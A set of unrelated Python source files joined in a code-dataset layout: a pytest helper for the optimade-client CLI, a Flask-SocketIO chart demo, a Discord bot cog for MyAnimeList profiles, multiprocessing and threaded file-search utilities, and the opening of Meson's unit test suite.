"""Run a command in the `optimade-client` CLI (through the Python API)."""
def _run_cli(options: List[str] = None, raises: bool = False) -> str:
"""Run a command in the `optimade-client` CLI (through the Python API)."""
from optimade_client.cli import run
if options is None:
options = []
try:
cli = Process(target=run.main, args=(options,))
cli.start()
sleep(5) # Startup time
output = capfd.readouterr()
finally:
os.kill(cli.pid, signal.SIGINT)
timeout = 10 # seconds
while cli.is_alive() and timeout:
sleep(1)
timeout -= 1
if cli.is_alive():
cli.kill()
cli.join()
sleep(1)
assert not cli.is_alive(), f"Could not stop CLI subprocess <PID={cli.pid}>"
if raises:
assert (
cli.exitcode != 0
), f"\nstdout:\n{output.out}\n\nstderr:\n{output.err}"
else:
assert (
cli.exitcode == 0
), f"\nstdout:\n{output.out}\n\nstderr:\n{output.err}"
return output.out + output.err
return _run_cli
|
main.py
|
from flask import Flask, render_template
from flask_socketio import SocketIO, send, emit
import json
import time
import random
import threading
# Required for server-side emit() to work
import eventlet
eventlet.monkey_patch()
app = Flask(__name__)
app.config['SECRET_KEY'] = 'dreamchaser'
socketio = SocketIO(app)
@app.route("/")
def index():
title = "Example Chart"
return render_template("index.html", title=title)
def produce_chart_data():
while True:
# Sleep for random duration to prove async working
time.sleep(0.1)
# Get some data from source and emit to clients when recieved
data = get_some_data()
socketio.emit('new-chart-data', data)
print("Emit data")
def get_some_data():
data = {
"series": [
{
"name": 'Data 1',
"data": [
{"x": 143034652600, "y": random.random()*10+70},
{"x": 143134652600, "y": random.random()*10+70},
{"x": 143234652600, "y": random.random()*10+70},
{"x": 143334652600, "y": random.random()*10+70},
{"x": 143434652600, "y": random.random()*10+70},
{"x": 143534652600, "y": random.random()*10+70},
{"x": 143634652600, "y": random.random()*10+70},
{"x": 143734652600, "y": random.random()*10+70},
{"x": 143834652600, "y": random.random()*10+70},
{"x": 143934652600, "y": random.random()*10+70}
]
}, {
"name": 'Data 2',
"data": [
{"x": 143034652600, "y": random.random()*10+40},
{"x": 143134652600, "y": random.random()*10+40},
{"x": 143234652600, "y": random.random()*10+40},
{"x": 143334652600, "y": random.random()*10+40},
{"x": 143434652600, "y": random.random()*10+40},
{"x": 143534652600, "y": random.random()*10+40},
{"x": 143634652600, "y": random.random()*10+40},
{"x": 143734652600, "y": random.random()*10+40},
{"x": 143834652600, "y": random.random()*10+40},
{"x": 143934652600, "y": random.random()*10+40}
]
}, {
"name": 'Data 3',
"data": [
{"x": 143034652600, "y": random.random()*10+25},
{"x": 143134652600, "y": random.random()*10+25},
{"x": 143234652600, "y": random.random()*10+25},
{"x": 143334652600, "y": random.random()*10+25},
{"x": 143434652600, "y": random.random()*10+25},
{"x": 143534652600, "y": random.random()*10+25},
{"x": 143634652600, "y": random.random()*10+25},
{"x": 143734652600, "y": random.random()*10+25},
{"x": 143834652600, "y": random.random()*10+25},
{"x": 143934652600, "y": random.random()*10+25}
]
}, {
"name": 'Data 3',
"data": [
{"x": 143034652600, "y": random.random()*10+25},
{"x": 143134652600, "y": random.random()*10+25},
{"x": 143234652600, "y": random.random()*10+25},
{"x": 143334652600, "y": random.random()*10+25},
{"x": 143434652600, "y": random.random()*10+25},
{"x": 143534652600, "y": random.random()*10+25},
{"x": 143634652600, "y": random.random()*10+25},
{"x": 143734652600, "y": random.random()*10+25},
{"x": 143834652600, "y": random.random()*10+25},
{"x": 143934652600, "y": random.random()*10+25}
]
}
]}
return data
if __name__ == '__main__':
t = threading.Thread(target=produce_chart_data)
t.start()
PORT = json.load(open('config.json'))["PORT"]
print("Running on localhost:"+str(PORT))
socketio.run(app, host='0.0.0.0', port=PORT)
|
usercog.py
|
import io
from datetime import datetime, timedelta
from threading import Thread
import discord
import jikanpy
import timeago
from discord.ext import tasks, commands
from jikanpy import Jikan
from tqdm import tqdm
from naotomori.util import jikanCall
class UserCog(commands.Cog):
"""
UserCog: handles all the user-related logic.
"""
def __init__(self, bot):
"""
Constructor: initialize the cog.
:param bot: The Discord bot.
"""
self.bot = bot
self.discordUser = None
self.malUser = None
self.channel = None
self.jikan = Jikan()
self.progress = io.StringIO("⌛ Please wait a bit")
self.lastUpdated = None
@commands.command(brief='Ping the bot')
async def ping(self, ctx):
"""
Ping the bot.
:param ctx: The context.
"""
await ctx.send(f'Pong: {round(self.bot.latency * 1000)}ms')
def start(self):
"""
Start the UserCog:
- retrieves the user from the database, if possible
- start the updateMalProfileLoop
"""
user = self.bot.get_cog('DatabaseCog').getUser()
if user[0] != '':
try:
self.malUser = self._getMALProfile(user[0])
except jikanpy.exceptions.APIException:
pass
self.discordUser = self._getMember(user[1])
if user[2] != '':
self.channel = self._getChannel(user[2])
if user[3] != '':
self.bot.command_prefix = user[3]
if not self.updateMalProfileLoop.is_running():
self.updateMalProfileLoop.start()
def _getMALProfile(self, username):
"""
Get the MyAnimeList user object, given the username.
:param username: The username of the MAL account.
:return: The MAL user.
"""
return jikanCall(self.jikan.user, username=username)
def _updateMALProfile(self, profile):
"""
Update the internal MAL user, i.e. updating the watching/reading list.
:param profile: The username of the MAL account.
"""
try:
newAnimeList = []
newMangaList = []
watching = jikanCall(self.jikan.user, username=profile, request='animelist', argument='watching')['anime']
ptw = jikanCall(self.jikan.user, username=profile, request='animelist', argument='ptw')['anime']
reading = jikanCall(self.jikan.user, username=profile, request='mangalist', argument='reading')['manga']
ptr = jikanCall(self.jikan.user, username=profile, request='mangalist', argument='ptr')['manga']
pbar = None
if self.progress:
# Set up progressbar in case it is the first time setting the user's profile
pbar = tqdm(
total=len(watching) + len(ptw) + len(reading) + len(ptr), file=self.progress, ncols=40,
bar_format="⌛{desc}: {n_fmt}/{total_fmt} [Remaining: {remaining}]"
)
for anime in watching + ptw:
anime['title_english'] = jikanCall(self.jikan.anime, id=anime['mal_id'])['title_english']
newAnimeList.append(anime)
if self.progress:
self.progress.truncate(0) # clear previous output
self.progress.seek(0)
pbar.update()
for manga in reading + ptr:
manga['title_english'] = jikanCall(self.jikan.manga, id=manga['mal_id'])['title_english']
newMangaList.append(manga)
if self.progress:
self.progress.truncate(0)
self.progress.seek(0)
pbar.update()
# If for some reason, we cannot retrieve the new lists (e.g. API error), keep the old ones
# In other words, only update the lists if we can retrieve the new ones
if newAnimeList:
self.bot.get_cog('AnimeCog').list = newAnimeList
if newMangaList:
self.bot.get_cog('MangaCog').list = newMangaList
self.lastUpdated = datetime.now()
except Exception as e:
# There's nothing we can do :'(
print(str(e))
if self.progress:
self.progress.close()
self.progress = None # no need in the future (only need progressbar for the first set up)
def _getMember(self, user):
"""
Get the Discord member object, give its name and tag.
:param user: The user (name + tag).
:return: The member object, if none can be found, return None.
"""
for member in self.bot.get_all_members():
if str(member) == user:
return member
return None
def _getChannel(self, channelName):
"""
Get the Discord channel object, give the name of the channel.
:param channelName: The name of the channel.
:return: The channel object, if none can be found, return None.
"""
for channel in self.bot.get_all_channels():
if str(channel) == channelName:
return channel
return None
@commands.command(brief='Set your MAL profile')
async def setProfile(self, ctx, profile: str):
"""
Set the internal MAL account, as well as the discord account and bot channel.
:param ctx: The context.
:param profile: Name of the MAL account.
"""
try:
self.malUser = self._getMALProfile(profile)
except jikanpy.exceptions.APIException:
await ctx.send(f'Unable to find user {profile}, make sure the profile is public.')
return
self.progress = io.StringIO("⌛ Please wait a bit") # start new profile
self.bot.get_cog('AnimeCog').list = []
self.bot.get_cog('MangaCog').list = []
self.discordUser = ctx.author
if self.channel is None:
self.channel = ctx.channel
self.bot.get_cog('DatabaseCog').setChannel(str(self.channel))
# Store data in database
self.bot.get_cog('DatabaseCog').setProfile(profile, str(self.discordUser))
thread = Thread(target=self._updateMALProfile, args=(profile,))
thread.start()
await ctx.send(
'🎉 Successfully set profile, you\'ll now receive notifications for new anime episodes and manga chapters!\n'
'🍵 It still may take some time for your profile to update though.'
)
@commands.command(brief='Remove your MAL profile from the bot')
async def removeProfile(self, ctx):
self.bot.get_cog('DatabaseCog').setProfile("", "")
self.discordUser = None
self.malUser = None
self.channel = None
self.bot.get_cog('AnimeCog').list = []
self.bot.get_cog('MangaCog').list = []
await ctx.send('😢 Successfully removed you from the bot!')
@commands.command(brief='Get a brief overview of your MAL profile')
async def getProfile(self, ctx):
"""
Get the MAL profile in form of an embed
:param ctx: The context.
"""
if self.progress and self.malUser:
embed = discord.Embed(title=self.malUser['username'], color=discord.Color.green(), url=self.malUser['url'])
embed.add_field(name="🔧 Setting up profile", value=str(self.progress.getvalue()))
if self.malUser['image_url']:
embed.set_thumbnail(url=self.malUser['image_url'])
await ctx.send(embed=embed)
elif self.malUser:
embed = discord.Embed(title=self.malUser['username'], color=discord.Color.green(), url=self.malUser['url'])
embed.add_field(name="Currently Watching / Plan-to-Watch Anime",
value=str(len(self.bot.get_cog('AnimeCog').list)), inline=False)
embed.add_field(name="Currently Reading / Plan-to-Read Manga",
value=str(len(self.bot.get_cog('MangaCog').list)), inline=False)
if self.lastUpdated:
now = datetime.now() + timedelta(seconds=60 * 3.4)
embed.set_footer(text=f"Last updated: {timeago.format(self.lastUpdated, now)}")
if self.malUser['image_url']:
embed.set_thumbnail(url=self.malUser['image_url'])
await ctx.send(embed=embed)
else:
await ctx.send("Profile is not set, please use `!setProfile <USERNAME>` first.")
@commands.command(brief='Set the bot channel (where it will ping you)')
async def setChannel(self, ctx, channel: discord.TextChannel):
"""
Set the bot channel.
:param ctx: The context.
:param channel: Name of the bot channel.
"""
self.channel = channel
self.bot.get_cog('DatabaseCog').setChannel(str(channel))
await ctx.send(f'📺 Successfully set bot channel to {channel.mention}.')
@commands.command(brief='Set the prefix of the bot')
async def setPrefix(self, ctx, prefix: str):
"""
Set the prefix of the bot
:param ctx: The context.
:param prefix: The new prefix for the bot.
"""
self.bot.command_prefix = prefix
self.bot.get_cog('DatabaseCog').setPrefix(prefix)
await ctx.send(f'❗ Successfully set the prefix to `{prefix}`.')
@setChannel.error
async def setChannelError(self, ctx, error):
"""
Error Handler for setChannel.
:param ctx: The context.
:param error: The error raised.
"""
await ctx.send(error.args[0])
@tasks.loop(hours=3)
async def updateMalProfileLoop(self):
"""
Loop that periodically updates the MAL account, i.e. update watching/reading list.
"""
if self.malUser:
thread = Thread(target=self._updateMALProfile, args=(self.malUser['username'],))
thread.start()
|
multiprocess.py
|
import multiprocessing
import os
import signal
import time
HANDLED_SIGNALS = (
signal.SIGINT, # Unix signal 2. Sent by Ctrl+C.
signal.SIGTERM, # Unix signal 15. Sent by `kill <pid>`.
)
class Multiprocess:
def __init__(self, config):
self.config = config
self.workers = config.workers
self.should_exit = False
def handle_exit(self, sig, frame):
self.should_exit = True
def run(self, target, *args, **kwargs):
pid = os.getpid()
logger = self.config.logger_instance
logger.info("Started parent process [{}]".format(pid))
for sig in HANDLED_SIGNALS:
signal.signal(sig, self.handle_exit)
processes = []
for idx in range(self.workers):
process = multiprocessing.Process(target=target, args=args, kwargs=kwargs)
process.start()
processes.append(process)
while (
any([process.is_alive() for process in processes]) and not self.should_exit
):
time.sleep(0.1)
logger.info("Stopping parent process [{}]".format(pid))
|
concurrent_file_search.py
|
import os
from os.path import isdir, join
from threading import Lock, Thread
mutex = Lock()
matches = []
def file_search(root, filename):
print("Searching in:", root)
child_threads = []
for file in os.listdir(root):
full_path = join(root, file)
if filename in file:
mutex.acquire()
matches.append(full_path)
mutex.release()
if isdir(full_path):
t = Thread(target=file_search, args=([full_path, filename]))
t.start()
child_threads.append(t)
for t in child_threads:
t.join()
def main():
t = Thread(target=file_search, args=(["c:/tools", "README.md"]))
t.start()
t.join()
for m in matches:
print("Matched:", m)
main()
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import zipfile, tarfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import typing as T
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.interpreterbase import typed_pos_args, InvalidArguments
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath, is_linux, git
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException, OptionKey
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.scripts import destdir_join
from mesonbuild.mtest import TAPParser, TestResult
from mesonbuild.wrap.wrap import PackageDefinition, WrapException
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
if T.TYPE_CHECKING:
from mesonbuild.compilers import Compiler
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(curdir)
def get_dynamic_section_entry(fname: str, entry: str) -> T.Optional[str]:
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return str(m.group(1))
return None # The file did not contain the specified entry.
def get_soname(fname: str) -> T.Optional[str]:
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname: str) -> T.Optional[str]:
raw = get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
# Get both '' and None here
if not raw:
return None
# nix/nixos adds a bunch of stuff to the rpath out of necessity that we
# don't check for, so clear those
final = ':'.join([e for e in raw.split(':') if not e.startswith('/nix')])
return final
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def _git_init(project_dir):
# If a user has git configuration init.defaultBranch set we want to override that
with tempfile.TemporaryDirectory() as d:
out = git(['--version'], str(d))[1]
if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'):
extra_cmd = ['--initial-branch', 'master']
else:
extra_cmd = []
subprocess.check_call(['git', 'init'] + extra_cmd, cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
_git_add_all(project_dir)
def _git_add_all(project_dir):
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
key = OptionKey(feature)
if key not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10'), '2016.10')
self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.x'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class_none_flush(self):
cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock())
a = cc.compiler_args(['-I.'])
#first we are checking if the tree construction deduplicates the correct -I argument
a += ['-I..']
a += ['-I./tests/']
a += ['-I./tests2/']
#think this here as assertion, we cannot apply it, otherwise the CompilerArgs would already flush the changes:
# assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.'])
a += ['-I.']
a += ['-I.', '-I./tests/']
self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..'])
#then we are checking that when CompilerArgs already have a build container list, that the deduplication is taking the correct one
a += ['-I.', '-I./tests2/']
self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..'])
def test_compiler_args_class_d(self):
d = mesonbuild.compilers.DmdDCompiler([], 'fake', MachineChoice.HOST, 'info', 'arch')
# check include order is kept when deduplicating
a = d.compiler_args(['-Ifirst', '-Isecond', '-Ithird'])
a += ['-Ifirst']
self.assertEqual(a, ['-Ifirst', '-Isecond', '-Ithird'])
def test_compiler_args_class_clike(self):
cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock())
# Test that empty initialization works
a = cc.compiler_args()
self.assertEqual(a, [])
# Test that list initialization works
a = cc.compiler_args(['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
